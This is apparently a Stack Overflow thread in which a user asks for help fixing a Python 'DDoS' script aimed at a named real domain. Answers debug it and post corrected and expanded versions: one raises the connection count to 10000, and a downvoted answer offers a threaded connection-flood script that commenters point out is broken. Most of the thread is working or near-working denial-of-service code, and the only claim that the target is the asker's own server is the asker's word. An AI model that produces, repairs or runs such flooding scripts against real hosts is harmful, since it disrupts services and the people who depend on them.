# Getting error when my python ddos script running

Tags: python, sockets, ddos

I am trying to attack my server and I have this little ddos python script for that. But unfortunately I got this error:

```
ip = socket.gethostbyname(host)
socket.gaierror: [Errno 11004] getaddrinfo failed
```

Any idea how to solve this problem?

And this is the script:

```
import time, socket, os, sys, string

def restart_program():
    python = sys.executable
    os.execl(python, python, * sys.argv)
curdir = os.getcwd()

print ("DDoS mode loaded")
host="http://hajnalgroup.com"
port="80"
message="+---------------------------+"
conn="100"
ip = socket.gethostbyname(host)
print ("[" + ip + "]")
print ( "[Ip is locked]" )
print ( "[Attacking " + host + "]" )
print ("+----------------------------+")
def dos():
    #pid = os.fork()
    ddos = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        ddos.connect((host, port))
        ddos.send( message )
        ddos.sendto( message, (ip, port) )
        ddos.send( message );
    except socket.error, msg:
        print("|[Connection Failed] |")
    print ( "|[DDoS Attack Engaged] |")
    ddos.close()
for i in range(1, conn):
    dos()
print ("+----------------------------+")
print("The connections you requested had finished")
if __name__ == "__main__":
    answer = raw_input("Do you want to ddos more?")
    if answer.strip() in "y Y yes Yes YES".split():
        restart_program()
    else:
        print "bye"
```

Comment: Obl. pedantic comment: The first *D* in *DDOS* stands for 'distributed'; if you are connecting to your server from a single machine, you are creating a *DOS*, a Denial of Service attack. To be distributed you need more than one machine...

Comment: @MartijnPieters, it's possible he intends to 'distribute' it later :)

Answer (score 4, accepted):

Host name should be name of the host (`hajnalgroup.com`), not url (`http://hajnalgroup.com`).

```
>>> import socket
>>> socket.gethostbyname("http://hajnalgroup.com")
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
socket.gaierror: [Errno 11004] getaddrinfo failed
>>> socket.gethostbyname("hajnalgroup.com")
'89.134.187.222'
```

Replace following line:

```
host = "http://hajnalgroup.com"
```

with:

```
host = "hajnalgroup.com"
```

---

**UPDATE**

All arguments to the [`range`](http://docs.python.org/2/library/functions.html#range) function should be `int` objects:

```
>>> range(1, 10)
[1, 2, 3, 4, 5, 6, 7, 8, 9]
>>> range(1, "10")
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
TypeError: range() integer end argument expected, got str.
```

Replace `conn = "100"` with `conn = 100`.

Answer (score 3):

Port Number should also be a number.

```
import time, socket, os, sys, string
import subprocess

def restart_program():
    subprocess.call(['python', 'main.py'])

print ("DDoS mode loaded")
host = "YOUR_SITE.com"
port = 80
message = "+---------------------------+"
conn = 10000
ip = socket.gethostbyname(host)
print "[" + ip + "]"
print "[Ip is locked]"
print "[Attacking " + host + "]"
print message
def dos():
    # pid = os.fork()
    ddos = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        ddos.connect((host, port))
        ddos.send(message)
        ddos.sendto(message, (ip, port))
        ddos.send(message)
    except socket.error:
        print("|[Connection Failed] |")
    print ("|[DDoS Attack Engaged] |")
    ddos.close()
for i in range(1, conn):
    dos()
print message
print("The connections you requested had finished")
print message
if __name__ == "__main__":
    print "Do you want to ddos more?"
    answer = raw_input()
    if answer.strip() in "y Y yes Yes YES".split():
        restart_program()
    else:
        print "bye"
```

You should also use `subprocess` to restart dos script, which is better for multi-OS.

Answer (score -1):

## DDos Python

---

```py
#!/usr/bin/python3
import socket, sys, os, threading, platform
def cls():
    if platform.system() == 'Linux':
      os.system("clear")
    else:
         os.system("cls")
def main():
    cls()
    print("--- DDos Attack ---\n")
    host = input("Enter Host: ")
    port = int(input("\nEnter Port: ")
    print("\n")
    def portscanner(x):
        ip = socket.gethostbyname(host)
        print(f"Ip: {ip}\n")
        while True:
             s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
             ch = s.connect_ex((host,port))
             print(f"Packet Send To {ip}")
        for j in range(10): 
           t = threading.Thread(target=portscanner,args=[j]
           t.start()

if __name__ == '__main__':
  try:
     main()
  except (KeyboardInterrupt,EOFError):
      print("\nStop !!!")
      sys.exit()
```

Comment: Welcome to Stack Overflow. Please edit your answer and explain how it answers the specific question being asked. Stack Overflow is about learning, not providing snippets to blindly copy and paste. See How to Answer. 
https://stackoverflow.com/help/how-to-answer

Comment: As it’s currently written, your answer is unclear. Please [edit] to add additional details that will help others understand how this addresses the question asked. You can find more information on how to write good answers [in the help center](/help/how-to-answer).

Comment: There are a few things wrong in this code. First of all, why are you declaring a function into a function? 2) The function `portscanner` will not be called. It will be better modifying the indentation to make the program works. (There are also a few brackets not closed). Please, run the code before posting It on StackOverflow and please, add some description to describe what the program does.